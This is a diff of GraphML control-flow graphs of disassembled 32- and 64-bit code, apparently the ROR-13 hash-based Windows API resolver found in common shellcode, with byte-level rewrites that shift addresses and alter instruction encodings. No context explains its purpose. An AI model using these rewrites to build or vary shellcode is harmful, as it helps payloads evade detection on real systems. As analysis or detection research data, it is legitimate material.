+        <node id="block.0x1036:instruction.0x103d">
+          <data key="address">0x103d</data>
          <data key="type">instruction</data>
          <data key="instruction.hex">8b423c</data>
          <data key="instruction.source">mov eax, dword ptr [rdx + 0x3c]</data>
        </node>
-        <node id="block.0x1039:instruction.0x1043">
-          <data key="address">0x1043</data>
+        <node id="block.0x1036:instruction.0x1040">
+          <data key="address">0x1040</data>
          <data key="type">instruction</data>
          <data key="instruction.hex">4801d0</data>
          <data key="instruction.source">add rax, rdx</data>
        </node>
-        <node id="block.0x1039:instruction.0x1046">
-          <data key="address">0x1046</data>
+        <node id="block.0x1036:instruction.0x1043">
+          <data key="address">0x1043</data>
          <data key="type">instruction</data>
          <data key="instruction.hex">668178180b02</data>
          <data key="instruction.source">cmp word ptr [rax + 0x18], 0x20b</data>
        </node>
-        <node id="block.0x1039:instruction.0x104c">
-          <data key="address">0x104c</data>
+        <node id="block.0x1036:instruction.0x1049">
+          <data key="address">0x1049</data>
          <data key="type">instruction</data>
-          <data key="instruction.hex">756f</data>
+          <data key="instruction.hex">7572</data>
          <data key="instruction.source">jne 0x10bd</data>
        </node>
-        <edge source="block.0x1039:instruction.0x1039" target="block.0x1039:instruction.0x103c"/>
-        <edge source="block.0x1039:instruction.0x1039" target="block.0x1039:instruction.0x103a"/>
-        <edge source="block.0x1039:instruction.0x103a" target="block.0x1039:instruction.0x104c"/>
-        <edge source="block.0x1039:instruction.0x103c" target="block.0x1039:instruction.0x1040"/>
-        <edge source="block.0x1039:instruction.0x103c" target="block.0x1039:instruction.0x1043"/>
-        <edge source="block.0x1039:instruction.0x1040" target="block.0x1039:instruction.0x1043"/>
-        <edge source="block.0x1039:instruction.0x1043" target="block.0x1039:instruction.0x1046"/>
-        <edge source="block.0x1039:instruction.0x1046" target="block.0x1039:instruction.0x104c"/>
+        <edge source="block.0x1036:instruction.0x1036" target="block.0x1036:instruction.0x1039"/>
+        <edge source="block.0x1036:instruction.0x1036" target="block.0x1036:instruction.0x1037"/>
+        <edge source="block.0x1036:instruction.0x1037" target="block.0x1036:instruction.0x1049"/>
+        <edge source="block.0x1036:instruction.0x1039" target="block.0x1036:instruction.0x103d"/>
+        <edge source="block.0x1036:instruction.0x1039" target="block.0x1036:instruction.0x1040"/>
+        <edge source="block.0x1036:instruction.0x103d" target="block.0x1036:instruction.0x1040"/>
+        <edge source="block.0x1036:instruction.0x1040" target="block.0x1036:instruction.0x1043"/>
+        <edge source="block.0x1036:instruction.0x1043" target="block.0x1036:instruction.0x1049"/>
      </graph>
    </node>
-    <node id="block.0x104e">
-      <data key="address">0x104e</data>
+    <node id="block.0x104b">
+      <data key="address">0x104b</data>
      <data key="type">block</data>
      <graph edgedefault="directed">
-        <data key="address">0x104e</data>
+        <data key="address">0x104b</data>
        <data key="type">block</data>
-        <node id="block.0x104e:instruction.0x104e">
-          <data key="address">0x104e</data>
+        <node id="block.0x104b:instruction.0x104b">
+          <data key="address">0x104b</data>
          <data key="type">instruction</data>
          <data key="instruction.hex">8b8088000000</data>
          <data key="instruction.source">mov eax, dword ptr [rax + 0x88]</data>
        </node>
-        <node id="block.0x104e:instruction.0x1054">
-          <data key="address">0x1054</data>
+        <node id="block.0x104b:instruction.0x1051">
+          <data key="address">0x1051</data>
          <data key="type">instruction</data>
          <data key="instruction.hex">4885c0</data>
          <data key="instruction.source">test rax, rax</data>
        </node>
-        <node id="block.0x104e:instruction.0x1057">
-          <data key="address">0x1057</data>
+        <node id="block.0x104b:instruction.0x1054">
+          <data key="address">0x1054</data>
          <data key="type">instruction</data>
-          <data key="instruction.hex">7464</data>
+          <data key="instruction.hex">7467</data>
          <data key="instruction.source">je 0x10bd</data>
        </node>
-        <edge source="block.0x104e:instruction.0x104e" target="block.0x104e:instruction.0x1054"/>
-        <edge source="block.0x104e:instruction.0x1054" target="block.0x104e:instruction.0x1057"/>
+        <edge source="block.0x104b:instruction.0x104b" target="block.0x104b:instruction.0x1051"/>
+        <edge source="block.0x104b:instruction.0x1051" target="block.0x104b:instruction.0x1054"/>
      </graph>
    </node>
-    <node id="block.0x1059">
-      <data key="address">0x1059</data>
+    <node id="block.0x1056">
+      <data key="address">0x1056</data>
      <data key="type">block</data>
      <graph edgedefault="directed">
-        <data key="address">0x1059</data>
+        <data key="address">0x1056</data>
        <data key="type">block</data>
-        <node id="block.0x1059:instruction.0x1059">
-          <data key="address">0x1059</data>
+        <node id="block.0x1056:instruction.0x1056">
+          <data key="address">0x1056</data>
          <data key="type">instruction</data>
          <data key="instruction.hex">4801d0</data>
          <data key="instruction.source">add rax, rdx</data>
        </node>
-        <node id="block.0x1059:instruction.0x105c">
-          <data key="address">0x105c</data>
+        <node id="block.0x1056:instruction.0x1059">
+          <data key="address">0x1059</data>
          <data key="type">instruction</data>
          <data key="instruction.hex">50</data>
          <data key="instruction.source">push rax</data>
        </node>
-        <node id="block.0x1059:instruction.0x105d">
-          <data key="address">0x105d</data>
+        <node id="block.0x1056:instruction.0x105a">
+          <data key="address">0x105a</data>
          <data key="type">instruction</data>
          <data key="instruction.hex">8b4818</data>
          <data key="instruction.source">mov ecx, dword ptr [rax + 0x18]</data>
        </node>
-        <node id="block.0x1059:instruction.0x1060">
-          <data key="address">0x1060</data>
+        <node id="block.0x1056:instruction.0x105d">
+          <data key="address">0x105d</data>
          <data key="type">instruction</data>
          <data key="instruction.hex">448b4020</data>
          <data key="instruction.source">mov r8d, dword ptr [rax + 0x20]</data>
        </node>
-        <node id="block.0x1059:instruction.0x1064">
-          <data key="address">0x1064</data>
+        <node id="block.0x1056:instruction.0x1061">
+          <data key="address">0x1061</data>
          <data key="type">instruction</data>
          <data key="instruction.hex">4901d0</data>
          <data key="instruction.source">add r8, rdx</data>
        </node>
-        <edge source="block.0x1059:instruction.0x1059" target="block.0x1059:instruction.0x105c"/>
-        <edge source="block.0x1059:instruction.0x1059" target="block.0x1059:instruction.0x105d"/>
-        <edge source="block.0x1059:instruction.0x1059" target="block.0x1059:instruction.0x1060"/>
-        <edge source="block.0x1059:instruction.0x1060" target="block.0x1059:instruction.0x1064"/>
+        <edge source="block.0x1056:instruction.0x1056" target="block.0x1056:instruction.0x1059"/>
+        <edge source="block.0x1056:instruction.0x1056" target="block.0x1056:instruction.0x105a"/>
+        <edge source="block.0x1056:instruction.0x1056" target="block.0x1056:instruction.0x105d"/>
+        <edge source="block.0x1056:instruction.0x105d" target="block.0x1056:instruction.0x1061"/>
      </graph>
    </node>
-    <node id="block.0x1067">
-      <data key="address">0x1067</data>
+    <node id="block.0x1064">
+      <data key="address">0x1064</data>
      <data key="type">block</data>
      <graph edgedefault="directed">
-        <data key="address">0x1067</data>
+        <data key="address">0x1064</data>
        <data key="type">block</data>
-        <node id="block.0x1067:instruction.0x1067">
-          <data key="address">0x1067</data>
+        <node id="block.0x1064:instruction.0x1064">
+          <data key="address">0x1064</data>
          <data key="type">instruction</data>
-          <data key="instruction.hex">e353</data>
+          <data key="instruction.hex">e356</data>
          <data key="instruction.source">jrcxz 0x10bc</data>
        </node>
      </graph>
    </node>
-    <node id="block.0x1069">
-      <data key="address">0x1069</data>
+    <node id="block.0x1066">
+      <data key="address">0x1066</data>
      <data key="type">block</data>
      <graph edgedefault="directed">
-        <data key="address">0x1069</data>
+        <data key="address">0x1066</data>
        <data key="type">block</data>
-        <node id="block.0x1069:instruction.0x1069">
-          <data key="address">0x1069</data>
+        <node id="block.0x1066:instruction.0x1066">
+          <data key="address">0x1066</data>
          <data key="type">instruction</data>
          <data key="instruction.hex">48ffc9</data>
          <data key="instruction.source">dec rcx</data>
        </node>
-        <node id="block.0x1069:instruction.0x106c">
-          <data key="address">0x106c</data>
+        <node id="block.0x1066:instruction.0x1069">
+          <data key="address">0x1069</data>
          <data key="type">instruction</data>
          <data key="instruction.hex">418b3488</data>
          <data key="instruction.source">mov esi, dword ptr [r8 + rcx*4]</data>
        </node>
-        <node id="block.0x1069:instruction.0x1070">
-          <data key="address">0x1070</data>
+        <node id="block.0x1066:instruction.0x106d">
+          <data key="address">0x106d</data>
          <data key="type">instruction</data>
          <data key="instruction.hex">4801d6</data>
          <data key="instruction.source">add rsi, rdx</data>
        </node>
-        <node id="block.0x1069:instruction.0x1073">
-          <data key="address">0x1073</data>
+        <node id="block.0x1066:instruction.0x1070">
+          <data key="address">0x1070</data>
          <data key="type">instruction</data>
-          <data key="instruction.hex">448b4c2408</data>
-          <data key="instruction.source">mov r9d, dword ptr [rsp + 8]</data>
+          <data key="instruction.hex">4d31c9</data>
+          <data key="instruction.source">xor r9, r9</data>
        </node>
-        <edge source="block.0x1069:instruction.0x1069" target="block.0x1069:instruction.0x1070"/>
-        <edge source="block.0x1069:instruction.0x1069" target="block.0x1069:instruction.0x106c"/>
-        <edge source="block.0x1069:instruction.0x106c" target="block.0x1069:instruction.0x1070"/>
+        <edge source="block.0x1066:instruction.0x1066" target="block.0x1066:instruction.0x106d"/>
+        <edge source="block.0x1066:instruction.0x1066" target="block.0x1066:instruction.0x1069"/>
+        <edge source="block.0x1066:instruction.0x1069" target="block.0x1066:instruction.0x106d"/>
      </graph>
    </node>
-    <node id="block.0x1078">
-      <data key="address">0x1078</data>
+    <node id="block.0x1073">
+      <data key="address">0x1073</data>
      <data key="type">block</data>
      <graph edgedefault="directed">
-        <data key="address">0x1078</data>
+        <data key="address">0x1073</data>
        <data key="type">block</data>
-        <node id="block.0x1078:instruction.0x1078">
-          <data key="address">0x1078</data>
+        <node id="block.0x1073:instruction.0x1073">
+          <data key="address">0x1073</data>
          <data key="type">instruction</data>
          <data key="instruction.hex">4831c0</data>
          <data key="instruction.source">xor rax, rax</data>
        </node>
-        <node id="block.0x1078:instruction.0x107b">
-          <data key="address">0x107b</data>
+        <node id="block.0x1073:instruction.0x1076">
+          <data key="address">0x1076</data>
          <data key="type">instruction</data>
          <data key="instruction.hex">ac</data>
          <data key="instruction.source">lodsb al, byte ptr [rsi]</data>
        </node>
-        <node id="block.0x1078:instruction.0x107c">
-          <data key="address">0x107c</data>
+        <node id="block.0x1073:instruction.0x1077">
+          <data key="address">0x1077</data>
          <data key="type">instruction</data>
          <data key="instruction.hex">41c1c90d</data>
          <data key="instruction.source">ror r9d, 0xd</data>
        </node>
-        <node id="block.0x1078:instruction.0x1080">
-          <data key="address">0x1080</data>
+        <node id="block.0x1073:instruction.0x107b">
+          <data key="address">0x107b</data>
          <data key="type">instruction</data>
          <data key="instruction.hex">4101c1</data>
          <data key="instruction.source">add r9d, eax</data>
        </node>
-        <node id="block.0x1078:instruction.0x1083">
-          <data key="address">0x1083</data>
+        <node id="block.0x1073:instruction.0x107e">
+          <data key="address">0x107e</data>
          <data key="type">instruction</data>
          <data key="instruction.hex">38e0</data>
          <data key="instruction.source">cmp al, ah</data>
        </node>
-        <node id="block.0x1078:instruction.0x1085">
-          <data key="address">0x1085</data>
+        <node id="block.0x1073:instruction.0x1080">
+          <data key="address">0x1080</data>
          <data key="type">instruction</data>
          <data key="instruction.hex">75f1</data>
-          <data key="instruction.source">jne 0x1078</data>
+          <data key="instruction.source">jne 0x1073</data>
        </node>
-        <edge source="block.0x1078:instruction.0x1078" target="block.0x1078:instruction.0x107b"/>
-        <edge source="block.0x1078:instruction.0x1078" target="block.0x1078:instruction.0x107c"/>
-        <edge source="block.0x1078:instruction.0x1078" target="block.0x1078:instruction.0x1083"/>
-        <edge source="block.0x1078:instruction.0x107b" target="block.0x1078:instruction.0x1080"/>
-        <edge source="block.0x1078:instruction.0x107b" target="block.0x1078:instruction.0x1083"/>
-        <edge source="block.0x1078:instruction.0x107c" target="block.0x1078:instruction.0x1080"/>
-        <edge source="block.0x1078:instruction.0x107c" target="block.0x1078:instruction.0x1085"/>
-        <edge source="block.0x1078:instruction.0x1080" target="block.0x1078:instruction.0x1083"/>
-        <edge source="block.0x1078:instruction.0x1083" target="block.0x1078:instruction.0x1085"/>
+        <edge source="block.0x1073:instruction.0x1073" target="block.0x1073:instruction.0x1076"/>
+        <edge source="block.0x1073:instruction.0x1073" target="block.0x1073:instruction.0x1077"/>
+        <edge source="block.0x1073:instruction.0x1073" target="block.0x1073:instruction.0x107e"/>
+        <edge source="block.0x1073:instruction.0x1076" target="block.0x1073:instruction.0x107b"/>
+        <edge source="block.0x1073:instruction.0x1076" target="block.0x1073:instruction.0x107e"/>
+        <edge source="block.0x1073:instruction.0x1077" target="block.0x1073:instruction.0x107b"/>
+        <edge source="block.0x1073:instruction.0x1077" target="block.0x1073:instruction.0x1080"/>
+        <edge source="block.0x1073:instruction.0x107b" target="block.0x1073:instruction.0x107e"/>
+        <edge source="block.0x1073:instruction.0x107e" target="block.0x1073:instruction.0x1080"/>
      </graph>
    </node>
-    <node id="block.0x1087">
-      <data key="address">0x1087</data>
+    <node id="block.0x1082">
+      <data key="address">0x1082</data>
      <data key="type">block</data>
      <graph edgedefault="directed">
-        <data key="address">0x1087</data>
+        <data key="address">0x1082</data>
        <data key="type">block</data>
-        <node id="block.0x1087:instruction.0x1087">
+        <node id="block.0x1082:instruction.0x1082">
+          <data key="address">0x1082</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">4c034c2408</data>
+          <data key="instruction.source">add r9, qword ptr [rsp + 8]</data>
+        </node>
+        <node id="block.0x1082:instruction.0x1087">
          <data key="address">0x1087</data>
          <data key="type">instruction</data>
          <data key="instruction.hex">4539d1</data>
          <data key="instruction.source">cmp r9d, r10d</data>
        </node>
-        <node id="block.0x1087:instruction.0x108a">
+        <node id="block.0x1082:instruction.0x108a">
          <data key="address">0x108a</data>
          <data key="type">instruction</data>
-          <data key="instruction.hex">75db</data>
-          <data key="instruction.source">jne 0x1067</data>
+          <data key="instruction.hex">75d8</data>
+          <data key="instruction.source">jne 0x1064</data>
        </node>
-        <edge source="block.0x1087:instruction.0x1087" target="block.0x1087:instruction.0x108a"/>
+        <edge source="block.0x1082:instruction.0x1082" target="block.0x1082:instruction.0x1087"/>
+        <edge source="block.0x1082:instruction.0x1087" target="block.0x1082:instruction.0x108a"/>
      </graph>
    </node>
    <node id="block.0x108c">
@@ -633,17 +640,17 @@
      </graph>
    </node>
    <edge source="block.0x1000" target="block.0x1017"/>
-    <edge source="block.0x1017" target="block.0x1026"/>
-    <edge source="block.0x1026" target="block.0x102e"/>
-    <edge source="block.0x102e" target="block.0x1030"/>
-    <edge source="block.0x1030" target="block.0x1039"/>
-    <edge source="block.0x1039" target="block.0x104e"/>
-    <edge source="block.0x104e" target="block.0x1059"/>
-    <edge source="block.0x1059" target="block.0x1067"/>
-    <edge source="block.0x1067" target="block.0x1069"/>
-    <edge source="block.0x1069" target="block.0x1078"/>
-    <edge source="block.0x1078" target="block.0x1087"/>
-    <edge source="block.0x1087" target="block.0x108c"/>
+    <edge source="block.0x1017" target="block.0x1023"/>
+    <edge source="block.0x1023" target="block.0x102b"/>
+    <edge source="block.0x102b" target="block.0x102d"/>
+    <edge source="block.0x102d" target="block.0x1036"/>
+    <edge source="block.0x1036" target="block.0x104b"/>
+    <edge source="block.0x104b" target="block.0x1056"/>
+    <edge source="block.0x1056" target="block.0x1064"/>
+    <edge source="block.0x1064" target="block.0x1066"/>
+    <edge source="block.0x1066" target="block.0x1073"/>
+    <edge source="block.0x1073" target="block.0x1082"/>
+    <edge source="block.0x1082" target="block.0x108c"/>
    <edge source="block.0x108c" target="block.0x10bc"/>
    <edge source="block.0x10bc" target="block.0x10bd"/>
  </graph>
@@ -69,471 +69,492 @@
        <node id="block.0x100f:instruction.0x1012">
          <data key="address">0x1012</data>
          <data key="type">instruction</data>
-          <data key="instruction.hex">0fb74a24</data>
-          <data key="instruction.source">movzx ecx, word ptr [edx + 0x24]</data>
+          <data key="instruction.hex">0fb74a26</data>
+          <data key="instruction.source">movzx ecx, word ptr [edx + 0x26]</data>
        </node>
        <node id="block.0x100f:instruction.0x1016">
          <data key="address">0x1016</data>
          <data key="type">instruction</data>
-          <data key="instruction.hex">bf00000000</data>
-          <data key="instruction.source">mov edi, 0</data>
+          <data key="instruction.hex">31ff</data>
+          <data key="instruction.source">xor edi, edi</data>
        </node>
      </graph>
    </node>
-    <node id="block.0x101b">
-      <data key="address">0x101b</data>
+    <node id="block.0x1018">
+      <data key="address">0x1018</data>
      <data key="type">block</data>
      <graph edgedefault="directed">
-        <data key="address">0x101b</data>
+        <data key="address">0x1018</data>
        <data key="type">block</data>
-        <node id="block.0x101b:instruction.0x101b">
-          <data key="address">0x101b</data>
+        <node id="block.0x1018:instruction.0x1018">
+          <data key="address">0x1018</data>
          <data key="type">instruction</data>
          <data key="instruction.hex">31c0</data>
          <data key="instruction.source">xor eax, eax</data>
        </node>
-        <node id="block.0x101b:instruction.0x101d">
-          <data key="address">0x101d</data>
+        <node id="block.0x1018:instruction.0x101a">
+          <data key="address">0x101a</data>
          <data key="type">instruction</data>
          <data key="instruction.hex">ac</data>
          <data key="instruction.source">lodsb al, byte ptr [esi]</data>
        </node>
-        <node id="block.0x101b:instruction.0x101e">
-          <data key="address">0x101e</data>
+        <node id="block.0x1018:instruction.0x101b">
+          <data key="address">0x101b</data>
          <data key="type">instruction</data>
          <data key="instruction.hex">3c61</data>
          <data key="instruction.source">cmp al, 0x61</data>
        </node>
-        <node id="block.0x101b:instruction.0x1020">
-          <data key="address">0x1020</data>
+        <node id="block.0x1018:instruction.0x101d">
+          <data key="address">0x101d</data>
          <data key="type">instruction</data>
          <data key="instruction.hex">7c02</data>
-          <data key="instruction.source">jl 0x1024</data>
+          <data key="instruction.source">jl 0x1021</data>
        </node>
-        <edge source="block.0x101b:instruction.0x101b" target="block.0x101b:instruction.0x101d"/>
-        <edge source="block.0x101b:instruction.0x101d" target="block.0x101b:instruction.0x101e"/>
-        <edge source="block.0x101b:instruction.0x101e" target="block.0x101b:instruction.0x1020"/>
+        <edge source="block.0x1018:instruction.0x1018" target="block.0x1018:instruction.0x101a"/>
+        <edge source="block.0x1018:instruction.0x101a" target="block.0x1018:instruction.0x101b"/>
+        <edge source="block.0x1018:instruction.0x101b" target="block.0x1018:instruction.0x101d"/>
      </graph>
    </node>
-    <node id="block.0x1022">
-      <data key="address">0x1022</data>
+    <node id="block.0x101f">
+      <data key="address">0x101f</data>
      <data key="type">block</data>
      <graph edgedefault="directed">
-        <data key="address">0x1022</data>
+        <data key="address">0x101f</data>
        <data key="type">block</data>
-        <node id="block.0x1022:instruction.0x1022">
-          <data key="address">0x1022</data>
+        <node id="block.0x101f:instruction.0x101f">
+          <data key="address">0x101f</data>
          <data key="type">instruction</data>
          <data key="instruction.hex">2c20</data>
          <data key="instruction.source">sub al, 0x20</data>
        </node>
      </graph>
    </node>
-    <node id="block.0x1024">
-      <data key="address">0x1024</data>
+    <node id="block.0x1021">
+      <data key="address">0x1021</data>
      <data key="type">block</data>
      <graph edgedefault="directed">
-        <data key="address">0x1024</data>
+        <data key="address">0x1021</data>
        <data key="type">block</data>
-        <node id="block.0x1024:instruction.0x1024">
-          <data key="address">0x1024</data>
+        <node id="block.0x1021:instruction.0x1021">
+          <data key="address">0x1021</data>
          <data key="type">instruction</data>
          <data key="instruction.hex">c1cf0d</data>
          <data key="instruction.source">ror edi, 0xd</data>
        </node>
-        <node id="block.0x1024:instruction.0x1027">
-          <data key="address">0x1027</data>
+        <node id="block.0x1021:instruction.0x1024">
+          <data key="address">0x1024</data>
          <data key="type">instruction</data>
          <data key="instruction.hex">01c7</data>
          <data key="instruction.source">add edi, eax</data>
        </node>
-        <node id="block.0x1024:instruction.0x1029">
-          <data key="address">0x1029</data>
+        <node id="block.0x1021:instruction.0x1026">
+          <data key="address">0x1026</data>
          <data key="type">instruction</data>
          <data key="instruction.hex">49</data>
          <data key="instruction.source">dec ecx</data>
        </node>
-        <node id="block.0x1024:instruction.0x102a">
-          <data key="address">0x102a</data>
+        <node id="block.0x1021:instruction.0x1027">
+          <data key="address">0x1027</data>
          <data key="type">instruction</data>
          <data key="instruction.hex">75ef</data>
-          <data key="instruction.source">jne 0x101b</data>
+          <data key="instruction.source">jne 0x1018</data>
        </node>
-        <edge source="block.0x1024:instruction.0x1024" target="block.0x1024:instruction.0x1027"/>
-        <edge source="block.0x1024:instruction.0x1027" target="block.0x1024:instruction.0x1029"/>
-        <edge source="block.0x1024:instruction.0x1029" target="block.0x1024:instruction.0x102a"/>
+        <edge source="block.0x1021:instruction.0x1021" target="block.0x1021:instruction.0x1024"/>
+        <edge source="block.0x1021:instruction.0x1024" target="block.0x1021:instruction.0x1026"/>
+        <edge source="block.0x1021:instruction.0x1026" target="block.0x1021:instruction.0x1027"/>
      </graph>
    </node>
-    <node id="block.0x102c">
-      <data key="address">0x102c</data>
+    <node id="block.0x1029">
+      <data key="address">0x1029</data>
      <data key="type">block</data>
      <graph edgedefault="directed">
-        <data key="address">0x102c</data>
+        <data key="address">0x1029</data>
        <data key="type">block</data>
-        <node id="block.0x102c:instruction.0x102c">
-          <data key="address">0x102c</data>
+        <node id="block.0x1029:instruction.0x1029">
+          <data key="address">0x1029</data>
          <data key="type">instruction</data>
          <data key="instruction.hex">52</data>
          <data key="instruction.source">push edx</data>
        </node>
-        <node id="block.0x102c:instruction.0x102d">
-          <data key="address">0x102d</data>
+        <node id="block.0x1029:instruction.0x102a">
+          <data key="address">0x102a</data>
          <data key="type">instruction</data>
          <data key="instruction.hex">57</data>
          <data key="instruction.source">push edi</data>
        </node>
-        <node id="block.0x102c:instruction.0x102e">
-          <data key="address">0x102e</data>
+        <node id="block.0x1029:instruction.0x102b">
+          <data key="address">0x102b</data>
          <data key="type">instruction</data>
          <data key="instruction.hex">8b5210</data>
          <data key="instruction.source">mov edx, dword ptr [edx + 0x10]</data>
        </node>
-        <node id="block.0x102c:instruction.0x1031">
-          <data key="address">0x1031</data>
+        <node id="block.0x1029:instruction.0x102e">
+          <data key="address">0x102e</data>
          <data key="type">instruction</data>
          <data key="instruction.hex">8b423c</data>
          <data key="instruction.source">mov eax, dword ptr [edx + 0x3c]</data>
        </node>
-        <node id="block.0x102c:instruction.0x1034">
-          <data key="address">0x1034</data>
+        <node id="block.0x1029:instruction.0x1031">
+          <data key="address">0x1031</data>
          <data key="type">instruction</data>
          <data key="instruction.hex">01d0</data>
          <data key="instruction.source">add eax, edx</data>
        </node>
-        <node id="block.0x102c:instruction.0x1036">
-          <data key="address">0x1036</data>
+        <node id="block.0x1029:instruction.0x1033">
+          <data key="address">0x1033</data>
          <data key="type">instruction</data>
          <data key="instruction.hex">8b4078</data>
          <data key="instruction.source">mov eax, dword ptr [eax + 0x78]</data>
        </node>
-        <node id="block.0x102c:instruction.0x1039">
-          <data key="address">0x1039</data>
+        <node id="block.0x1029:instruction.0x1036">
+          <data key="address">0x1036</data>
          <data key="type">instruction</data>
          <data key="instruction.hex">85c0</data>
          <data key="instruction.source">test eax, eax</data>
        </node>
-        <node id="block.0x102c:instruction.0x103b">
-          <data key="address">0x103b</data>
+        <node id="block.0x1029:instruction.0x1038">
+          <data key="address">0x1038</data>
          <data key="type">instruction</data>
-          <data key="instruction.hex">744a</data>
-          <data key="instruction.source">je 0x1087</data>
+          <data key="instruction.hex">744c</data>
+          <data key="instruction.source">je 0x1086</data>
        </node>
-        <edge source="block.0x102c:instruction.0x102c" target="block.0x102c:instruction.0x102d"/>
-        <edge source="block.0x102c:instruction.0x102c" target="block.0x102c:instruction.0x102e"/>
-        <edge source="block.0x102c:instruction.0x102d" target="block.0x102c:instruction.0x103b"/>
-        <edge source="block.0x102c:instruction.0x102e" target="block.0x102c:instruction.0x1031"/>
-        <edge source="block.0x102c:instruction.0x102e" target="block.0x102c:instruction.0x1034"/>
-        <edge source="block.0x102c:instruction.0x1031" target="block.0x102c:instruction.0x1034"/>
-        <edge source="block.0x102c:instruction.0x1034" target="block.0x102c:instruction.0x1036"/>
-        <edge source="block.0x102c:instruction.0x1036" target="block.0x102c:instruction.0x1039"/>
-        <edge source="block.0x102c:instruction.0x1039" target="block.0x102c:instruction.0x103b"/>
+        <edge source="block.0x1029:instruction.0x1029" target="block.0x1029:instruction.0x102a"/>
+        <edge source="block.0x1029:instruction.0x1029" target="block.0x1029:instruction.0x102b"/>
+        <edge source="block.0x1029:instruction.0x102a" target="block.0x1029:instruction.0x1038"/>
+        <edge source="block.0x1029:instruction.0x102b" target="block.0x1029:instruction.0x102e"/>
+        <edge source="block.0x1029:instruction.0x102b" target="block.0x1029:instruction.0x1031"/>
+        <edge source="block.0x1029:instruction.0x102e" target="block.0x1029:instruction.0x1031"/>
+        <edge source="block.0x1029:instruction.0x1031" target="block.0x1029:instruction.0x1033"/>
+        <edge source="block.0x1029:instruction.0x1033" target="block.0x1029:instruction.0x1036"/>
+        <edge source="block.0x1029:instruction.0x1036" target="block.0x1029:instruction.0x1038"/>
      </graph>
    </node>
-    <node id="block.0x103d">
-      <data key="address">0x103d</data>
+    <node id="block.0x103a">
+      <data key="address">0x103a</data>
      <data key="type">block</data>
      <graph edgedefault="directed">
-        <data key="address">0x103d</data>
+        <data key="address">0x103a</data>
        <data key="type">block</data>
-        <node id="block.0x103d:instruction.0x103d">
-          <data key="address">0x103d</data>
+        <node id="block.0x103a:instruction.0x103a">
+          <data key="address">0x103a</data>
          <data key="type">instruction</data>
          <data key="instruction.hex">01d0</data>
          <data key="instruction.source">add eax, edx</data>
        </node>
-        <node id="block.0x103d:instruction.0x103f">
-          <data key="address">0x103f</data>
+        <node id="block.0x103a:instruction.0x103c">
+          <data key="address">0x103c</data>
          <data key="type">instruction</data>
          <data key="instruction.hex">50</data>
          <data key="instruction.source">push eax</data>
        </node>
-        <node id="block.0x103d:instruction.0x1040">
-          <data key="address">0x1040</data>
+        <node id="block.0x103a:instruction.0x103d">
+          <data key="address">0x103d</data>
          <data key="type">instruction</data>
          <data key="instruction.hex">8b4818</data>
          <data key="instruction.source">mov ecx, dword ptr [eax + 0x18]</data>
        </node>
-        <node id="block.0x103d:instruction.0x1043">
-          <data key="address">0x1043</data>
+        <node id="block.0x103a:instruction.0x1040">
+          <data key="address">0x1040</data>
          <data key="type">instruction</data>
          <data key="instruction.hex">8b5820</data>
          <data key="instruction.source">mov ebx, dword ptr [eax + 0x20]</data>
        </node>
-        <node id="block.0x103d:instruction.0x1046">
-          <data key="address">0x1046</data>
+        <node id="block.0x103a:instruction.0x1043">
+          <data key="address">0x1043</data>
          <data key="type">instruction</data>
          <data key="instruction.hex">01d3</data>
          <data key="instruction.source">add ebx, edx</data>
        </node>
-        <edge source="block.0x103d:instruction.0x103d" target="block.0x103d:instruction.0x103f"/>
-        <edge source="block.0x103d:instruction.0x103d" target="block.0x103d:instruction.0x1040"/>
-        <edge source="block.0x103d:instruction.0x103d" target="block.0x103d:instruction.0x1043"/>
-        <edge source="block.0x103d:instruction.0x1043" target="block.0x103d:instruction.0x1046"/>
+        <edge source="block.0x103a:instruction.0x103a" target="block.0x103a:instruction.0x103c"/>
+        <edge source="block.0x103a:instruction.0x103a" target="block.0x103a:instruction.0x103d"/>
+        <edge source="block.0x103a:instruction.0x103a" target="block.0x103a:instruction.0x1040"/>
+        <edge source="block.0x103a:instruction.0x1040" target="block.0x103a:instruction.0x1043"/>
      </graph>
    </node>
-    <node id="block.0x1048">
-      <data key="address">0x1048</data>
+    <node id="block.0x1045">
+      <data key="address">0x1045</data>
      <data key="type">block</data>
      <graph edgedefault="directed">
-        <data key="address">0x1048</data>
+        <data key="address">0x1045</data>
        <data key="type">block</data>
-        <node id="block.0x1048:instruction.0x1048">
-          <data key="address">0x1048</data>
+        <node id="block.0x1045:instruction.0x1045">
+          <data key="address">0x1045</data>
          <data key="type">instruction</data>
          <data key="instruction.hex">85c9</data>
          <data key="instruction.source">test ecx, ecx</data>
        </node>
-        <node id="block.0x1048:instruction.0x104a">
-          <data key="address">0x104a</data>
+        <node id="block.0x1045:instruction.0x1047">
+          <data key="address">0x1047</data>
          <data key="type">instruction</data>
-          <data key="instruction.hex">743a</data>
-          <data key="instruction.source">je 0x1086</data>
+          <data key="instruction.hex">743c</data>
+          <data key="instruction.source">je 0x1085</data>
        </node>
-        <edge source="block.0x1048:instruction.0x1048" target="block.0x1048:instruction.0x104a"/>
+        <edge source="block.0x1045:instruction.0x1045" target="block.0x1045:instruction.0x1047"/>
      </graph>
    </node>
-    <node id="block.0x104c">
-      <data key="address">0x104c</data>
+    <node id="block.0x1049">
+      <data key="address">0x1049</data>
      <data key="type">block</data>
      <graph edgedefault="directed">
-        <data key="address">0x104c</data>
+        <data key="address">0x1049</data>
        <data key="type">block</data>
-        <node id="block.0x104c:instruction.0x104c">
-          <data key="address">0x104c</data>
+        <node id="block.0x1049:instruction.0x1049">
+          <data key="address">0x1049</data>
          <data key="type">instruction</data>
          <data key="instruction.hex">49</data>
          <data key="instruction.source">dec ecx</data>
        </node>
-        <node id="block.0x104c:instruction.0x104d">
-          <data key="address">0x104d</data>
+        <node id="block.0x1049:instruction.0x104a">
+          <data key="address">0x104a</data>
          <data key="type">instruction</data>
          <data key="instruction.hex">8b348b</data>
          <data key="instruction.source">mov esi, dword ptr [ebx + ecx*4]</data>
        </node>
-        <node id="block.0x104c:instruction.0x1050">
-          <data key="address">0x1050</data>
+        <node id="block.0x1049:instruction.0x104d">
+          <data key="address">0x104d</data>
          <data key="type">instruction</data>
          <data key="instruction.hex">01d6</data>
          <data key="instruction.source">add esi, edx</data>
        </node>
-        <node id="block.0x104c:instruction.0x1052">
-          <data key="address">0x1052</data>
+        <node id="block.0x1049:instruction.0x104f">
+          <data key="address">0x104f</data>
          <data key="type">instruction</data>
-          <data key="instruction.hex">8b7df8</data>
-          <data key="instruction.source">mov edi, dword ptr [ebp - 8]</data>
+          <data key="instruction.hex">31ff</data>
+          <data key="instruction.source">xor edi, edi</data>
        </node>
